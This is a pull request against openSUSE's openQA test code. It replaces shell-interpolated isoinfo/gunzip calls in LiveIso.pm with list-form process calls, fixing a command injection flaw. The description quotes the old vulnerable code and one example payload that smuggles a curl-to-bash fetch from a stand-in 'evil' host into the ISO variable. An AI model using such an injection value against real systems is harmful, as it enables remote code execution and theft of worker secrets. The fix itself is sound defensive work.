### PR TITLE
Refactor ISO extraction methods to enhance security and reliability

### DIFF
--- a/lib/Yam/Agama/LiveIso.pm
+++ b/lib/Yam/Agama/LiveIso.pm
@@ -11,60 +11,82 @@ use Exporter;
 use base 'opensusebasetest';
 use strict;
 use warnings;
+use v5.20;
+use feature qw(signatures);
+no warnings qw(experimental::signatures);
 use testapi;
+use Mojo::JSON qw(decode_json);
+use File::Temp qw(tempfile);
 
 our @EXPORT = qw(read_live_iso);
 
-sub read_iso_info {
-    my $iso_info = `isoinfo -j UTF-8 -R -x /LiveOS/.info -i @{[ get_var('ISO') ]}`;
-    die "Error getting info from ISO image" if ($? != 0);
-    return $iso_info;
+# Extract a member from the ISO via isoinfo. Args are passed as a LIST, so no
+# shell is spawned and the ISO value can never be parsed as shell syntax
+# (command injection fix, poo#202788). Dies with $errmsg on isoinfo failure.
+sub _isoinfo_extract ($member, $errmsg) {
+    open(my $fh, '-|', 'isoinfo', '-j', 'UTF-8', '-R', '-x', $member,
+        '-i', get_var('ISO')) or die "Cannot run isoinfo: $!";
+    binmode $fh;
+    my $data = do { local $/; <$fh> };
+    close $fh;
+    die $errmsg if $? != 0;
+    return $data;
 }
 
-sub get_package_version {
-    my ($package_name) = @_;
-    my $command = "isoinfo -j UTF-8 -R -x /LiveOS/.packages.json.gz -i @{[ get_var('ISO') ]}" .
-      " | gunzip" .
-      " | jq -r '.[] | select(.name==\"$package_name\") | .version'";
-
-    my $version = qx{$command};
-    chomp($version);
-    return $version;
+sub read_iso_info () {
+    return _isoinfo_extract('/LiveOS/.info', 'Error getting info from ISO image');
 }
 
-sub parse_agama_packages {
-    my @packages = qw(agama agama-autoinstall agama-cli agama-web-ui);
-    my %versions = map { $_ => get_package_version($_) } @packages;
-    die "Error getting Agama packages info from ISO image" if ($? != 0);
+# /LiveOS/.packages.json.gz is a gzipped JSON array of {name, version, ...}.
+# Decompressed via the gunzip binary over a temp file (no shell pipe,
+# deadlock-free), then decoded into an arrayref.
+sub _read_packages_json () {
+    my $gz = _isoinfo_extract('/LiveOS/.packages.json.gz',
+        'Error getting Agama packages info from ISO image');
 
-    # Set each package version as environment variable
-    set_var('AGAMA_PACKAGE_VERSION', $versions{'agama'} || '17+0');
-    set_var('AGAMA_AUTOINSTALL_PACKAGE_VERSION', $versions{'agama-autoinstall'} || '17+0');
-    set_var('AGAMA_CLI_PACKAGE_VERSION', $versions{'agama-cli'} || '17+0');
-    set_var('AGAMA_WEBUI_PACKAGE_VERSION', $versions{'agama-web-ui'} || '17+0');
-    join("\n", map { $_ . " => " . ($versions{$_} || '17+0') } keys %versions);
+    my ($tfh, $tpath) = tempfile(SUFFIX => '.json.gz', UNLINK => 1);
+    binmode $tfh;
+    print {$tfh} $gz;
+    close $tfh;
+
+    open(my $fh, '-|', 'gunzip', '-c', $tpath) or die "Cannot run gunzip: $!";
+    my $json = do { local $/; <$fh> };
+    close $fh;
+    die 'Error decompressing Agama packages info' if $? != 0;
+
+    return decode_json($json);
 }
 
-sub record_agama_info {
-    my ($info, $pkgs, $major_version) = @_;
+sub parse_agama_packages () {
+    my %env_var = (
+        AGAMA_PACKAGE_VERSION => 'agama',
+        AGAMA_AUTOINSTALL_PACKAGE_VERSION => 'agama-autoinstall',
+        AGAMA_CLI_PACKAGE_VERSION => 'agama-cli',
+        AGAMA_WEBUI_PACKAGE_VERSION => 'agama-web-ui',
+    );
+    my %version = map { $_->{name} => $_->{version} } @{_read_packages_json()};
+
+    set_var($_, $version{$env_var{$_}} || '17+0') for keys %env_var;
+    join "\n", map { "$_ => " . ($version{$_} || '17+0') } sort values %env_var;
+}
+
+sub record_agama_info ($info, $pkgs, $major_version) {
     record_info('AGAMA INFO',
         "ENV vars:\n" .
           "AGAMA_VERSION=$major_version\n\n" .
-          "ISO info:\n" .
-          $info . "\n" .
-          "Version of packages:\n" .
-          $pkgs
-    );
+          "ISO info:\n$info\n" .
+          "Version of packages:\n$pkgs");
 }
 
-sub read_live_iso {
+sub read_live_iso () {
     return unless get_var('ISO');
     my $info = read_iso_info();
     my $pkgs = parse_agama_packages();
     $info =~ /^Image.version:\s+(?<major_version>\d+\.\w+)\./m;
     # Agama version was not available yet on GM medium, so we inject the default value
-    set_var("AGAMA_VERSION", $+{'major_version'} // '17.0');
-    record_agama_info($info, $pkgs, ($+{'major_version'} || '17.0'));
+    my $major = $+{major_version} // '17.0';
+    set_var('AGAMA_VERSION', $major);
+    record_agama_info($info, $pkgs, $major);
 }
 
 1;

--- a/lib/Yam/Agama/LiveIso.pm
+++ b/lib/Yam/Agama/LiveIso.pm
@@ -4,6 +4,13 @@
 # Summary: Live ISO class to retrieve ISO data
 # Maintainer: QE Installation and Migration (QE Iam) <none@suse.de>
 
+=head1 Yam::Agama::LiveIso
+
+C<Yam::Agama::LiveIso> - Retrieve Agama Live ISO metadata (image info and
+package versions) and expose it through openQA variables.
+
+=cut
+
 package Yam::Agama::LiveIso;
 
 use base Exporter;
@@ -20,12 +27,19 @@ use File::Temp qw(tempfile);
 
 our @EXPORT = qw(read_live_iso);
 
-# Extract a member from the ISO via isoinfo. Args are passed as a LIST, so no
-# shell is spawned and the ISO value can never be parsed as shell syntax
-# (command injection fix, poo#202788). Dies with $errmsg on isoinfo failure.
-sub _isoinfo_extract ($member, $errmsg) {
-    open(my $fh, '-|', 'isoinfo', '-j', 'UTF-8', '-R', '-x', $member,
-        '-i', get_var('ISO')) or die "Cannot run isoinfo: $!";
+=head2 _run_and_slurp
+
+ _run_and_slurp($errmsg, @cmd);
+
+Run C<@cmd> as a child process and return its slurped output. C<@cmd> is passed
+as a LIST, so no shell is spawned and its arguments can never be parsed as shell
+syntax (command injection fix, poo#202788). Dies with C<$errmsg> if the command
+exits non-zero.
+
+=cut
+
+sub _run_and_slurp ($errmsg, @cmd) {
+    open(my $fh, '-|', @cmd) or die "Cannot run $cmd[0]: $!";
     binmode $fh;
     my $data = do { local $/; <$fh> };
     close $fh;
@@ -33,27 +47,57 @@ sub _isoinfo_extract ($member, $errmsg) {
     return $data;
 }
 
+=head2 _write_tempfile
+
+ _write_tempfile($content, $suffix);
+
+Write binary C<$content> to a temporary file (auto-removed at exit) and return
+its path. C<$suffix> defaults to C<.tmp>.
+
+=cut
+
+sub _write_tempfile ($content, $suffix = '.tmp') {
+    my ($fh, $path) = tempfile(SUFFIX => $suffix, UNLINK => 1);
+    binmode $fh;
+    print {$fh} $content;
+    close $fh;
+    return $path;
+}
+
+=head2 _isoinfo_extract
+
+ _isoinfo_extract($member, $errmsg);
+
+Extract C<$member> from the ISO (C<get_var('ISO')>) via C<isoinfo> and return
+its content. Dies with C<$errmsg> on failure.
+
+=cut
+
+sub _isoinfo_extract ($member, $errmsg) {
+    return _run_and_slurp($errmsg,
+        'isoinfo', '-j', 'UTF-8', '-R', '-x', $member, '-i', get_var('ISO'));
+}
+
 sub read_iso_info () {
     return _isoinfo_extract('/LiveOS/.info', 'Error getting info from ISO image');
 }
 
-# /LiveOS/.packages.json.gz is a gzipped JSON array of {name, version, ...}.
-# Decompressed via the gunzip binary over a temp file (no shell pipe,
-# deadlock-free), then decoded into an arrayref.
+=head2 _read_packages_json
+
+ _read_packages_json();
+
+Read C</LiveOS/.packages.json.gz> (a gzipped JSON array of C<{name, version,
+...}>) from the ISO, decompress it via the C<gunzip> binary over a temp file (no
+shell pipe, deadlock-free) and return the decoded arrayref.
+
+=cut
+
 sub _read_packages_json () {
     my $gz = _isoinfo_extract('/LiveOS/.packages.json.gz',
         'Error getting Agama packages info from ISO image');
-
-    my ($tfh, $tpath) = tempfile(SUFFIX => '.json.gz', UNLINK => 1);
-    binmode $tfh;
-    print {$tfh} $gz;
-    close $tfh;
-
-    open(my $fh, '-|', 'gunzip', '-c', $tpath) or die "Cannot run gunzip: $!";
-    my $json = do { local $/; <$fh> };
-    close $fh;
-    die 'Error decompressing Agama packages info' if $? != 0;
-
+    my $tpath = _write_tempfile($gz, '.json.gz');
+    my $json = _run_and_slurp('Error decompressing Agama packages info',
+        'gunzip', '-c', $tpath);
     return decode_json($json);
 }
 


### PR DESCRIPTION
## Rationale: 

**Risk of RCE / command injection in Yam::Agama::LiveIso**
 

  `LiveIso.pm` built shell command strings by interpolating the ISO job variable, then ran them with qx{} / backticks:
```Perl
  my $iso_info = `isoinfo ... -i @{[ get_var('ISO') ]}`;
  my $version  = qx{isoinfo ... -i @{[ get_var('ISO') ]} | gunzip | jq ...};
```

  `qx{}` hand the whole string to `/bin/sh -c`, so ISO was interpreted as shell syntax, not a filename. Anyone who can set ISO — i.e. anyone able to schedule or `openqa-clone-job` a job, no commit rights needed — could inject arbitrary commands:
  
```bash
  ISO='x; curl http://evil/x.sh | bash'   → runs on the openQA worker as the worker user
```
  Impact: remote code execution on the worker host (not the SUT), reachable on every Agama scenario across all arches (x86_64/aarch64 via boot_agama;
  s390x/ppc64le/pvm via their bootloader modules). Workers hold registration secrets, cloud/SSH keys, and run jobs for many products — so one job's payload could
  pivot into shared infra. The bug crossed a trust boundary: data (an image name) was silently promoted to code execution.

## The fix

Eliminate the shell invocation entirely. All external calls now use list-form `open '-|', 'isoinfo', ... / 'gunzip', ...,` where each argument is passed directly to `execvp`. So ISO can only ever be a literal filename, never parsed as syntax. The `jq + shell` pipe were dropped: the gzipped package list is decompressed with the `gunzip` binary over a temp file and parsed in-process with `Mojo::JSON`.

## Side benefits

  - Fetch + decompress + parse now happen once instead of 4× (was one subprocess trio per package).
  - Dropped the external jq dependency.
  - Behaviour unchanged: same AGAMA_* variables, same defaults, same public read_live_iso contract.


- Related ticket: https://progress.opensuse.org/issues/202788
- Needles: n/a
- Verification runs:
   - https://openqa.suse.de/tests/23514525
   - https://openqa.suse.de/tests/23514526
   - https://openqa.suse.de/tests/23514527
   - https://openqa.suse.de/tests/23514528
   - https://openqa.suse.de/tests/23512179
   - https://openqa.suse.de/tests/23512183
   - https://openqa.suse.de/tests/23512184
   - https://openqa.suse.de/tests/23512185